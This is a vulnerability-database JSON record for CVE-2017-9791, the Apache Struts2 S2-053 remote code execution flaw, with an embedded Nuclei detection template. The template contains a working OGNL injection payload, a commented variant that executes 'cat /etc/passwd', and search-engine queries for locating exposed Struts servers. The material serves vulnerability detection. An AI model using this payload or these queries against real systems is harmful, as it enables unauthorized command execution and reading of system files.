{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2017-9791/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2017-9791/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2017-9791/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2017-9791/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2017-9791/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2017-9791"},"sightings":{"href":"/api/v1/sightings/cve-2017-9791"}},"enrichments":{"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2017/CVE-2017-9791.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2017-9791\n\ninfo:\n  name: Apache Struts2 S2-053 - Remote Code Execution\n  author: pikpikcu\n  severity: critical\n  description: |\n    Apache Struts 2.1.x and 2.3.x  with the Struts 1 plugin might allow remote code execution via a malicious field value passed in a raw message to the ActionMessage.\n  impact: |\n    Remote code execution\n  remediation: |\n    Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts2.\n  reference:\n    - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html\n    - http://struts.apache.org/docs/s2-048.html\n    - http://web.archive.org/web/20211207175819/https://securitytracker.com/id/1038838\n    - http://www.securitytracker.com/id/1038838\n    - https://security.netapp.com/advisory/ntap-20180706-0002/\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2017-9791\n    cwe-id: CWE-20\n    epss-score: 0.98908\n    epss-percentile: 0.99928\n    cpe: cpe:2.3:a:apache:struts:2.3.1:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: apache\n    product: struts\n    shodan-query:\n      - title:\"Struts2 Showcase\"\n      - http.title:\"struts2 showcase\"\n      - http.html:\"struts problem report\"\n      - http.html:\"apache struts\"\n    fofa-query:\n      - title=\"Struts2 Showcase\"\n      - title=\"struts2 showcase\"\n      - body=\"apache struts\"\n      - body=\"struts problem report\"\n    google-query: intitle:\"struts2 showcase\"\n  tags: cve2017,cve,apache,rce,struts,kev,vkev,vuln\nvariables:\n  num1: \"{{rand_int(40000, 44800)}}\"\n  num2: \"{{rand_int(40000, 44800)}}\"\n  result: \"{{to_number(num1)*to_number(num2)}}\"\n\n# CMD: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('cat /etc/passwd').getInputStream())).(#q)}\nhttp:\n  - method: POST\n    path:\n      - \"{{BaseURL}}/integration/saveGangster.action\"\n\n    body: |\n      name=%25%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3f%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3d%23%64%6d%29%3a%28%28%23%63%6f%6e%74%61%69%6e%65%72%3d%23%63%6f%6e%74%65%78%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%3d%23%63%6f%6e%74%61%69%6e%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%6f%6e%74%65%78%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%29%29%2e%28%23%71%3d%28{{num1}}%2a{{num2}}%29%29%2e%28%23%71%29%7d&age=10&__checkbox_bustedBefore=true&description=\n\n    headers:\n      Content-Type: application/x-www-form-urlencoded\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"{{result}}\"\n          - \"added successfully\"\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 490a00463044022054b7cf38dcc3162fa59b1e045e47cec3503a1d4f0716501ccc396526761d86f102207681f62a6bc70860090eda4ddae24f78875f5b2e83a40c6d1736238edb60d4d3:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2017-9791"}